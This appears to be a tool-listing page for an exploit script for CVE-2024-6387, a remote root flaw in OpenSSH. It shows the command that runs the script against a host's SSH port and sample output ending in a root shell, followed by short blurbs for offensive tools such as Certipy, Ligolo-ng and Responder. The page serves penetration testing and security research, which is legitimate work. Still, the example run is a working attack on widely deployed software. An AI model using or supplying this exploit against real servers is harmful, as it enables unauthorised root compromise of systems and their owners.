Screenshots
Example Usage
$ python3 CVE-2024-6387.py --exploit 192.168.56.101 --port 22
██████╗ ██████╗ ███████╗███╗ ██╗███████╗███████╗██╗ ██╗
██╔═══██╗██╔══██╗██╔════╝████╗ ██║██╔════╝██╔════╝██║ ██║
██║ ██║██████╔╝█████╗ ██╔██╗ ██║███████╗███████╗███████║
██║ ██║██╔═══╝ ██╔══╝ ██║╚██╗██║╚════██║╚════██║██╔══██║
╚██████╔╝██║ ███████╗██║ ╚████║███████║███████║██║ ██║
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═╝
Author: l0n3m4n / Scanner: @xaitax / PoC: @7etsuo
Exploiting vulnerabilities...
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
Received KEX_INIT (1024 bytes)
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
.....
Exploitation successful..!
~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
See also
100-redteam-projects
Free
Projects for security students…
Certipy
Open Source
Offensive tool for Active Directory Certificate Services (AD CS) enumeration and abuse. Finds and ex…
Red-Team-Rust
Open Source
A beginner-friendly collection of Rust notes focused on Red Team Tooling • Malware Development • Sys…
Ligolo-ng
Open Source
Advanced tunneling/pivoting tool that creates a VPN-like tunnel from the agent to the operator witho…
Responder (NBT-NS Poisoner)
Open Source
Kali
Rogue authentication server and LLMNR/NBT-NS/mDNS poisoner for Windows networks. Captures NTLM chall…
CVE_Prioritizer
Open Source
Streamline vulnerability patching with CVSS, EPSS, and CISA's Known Exploited Vulnerabilities. Prior…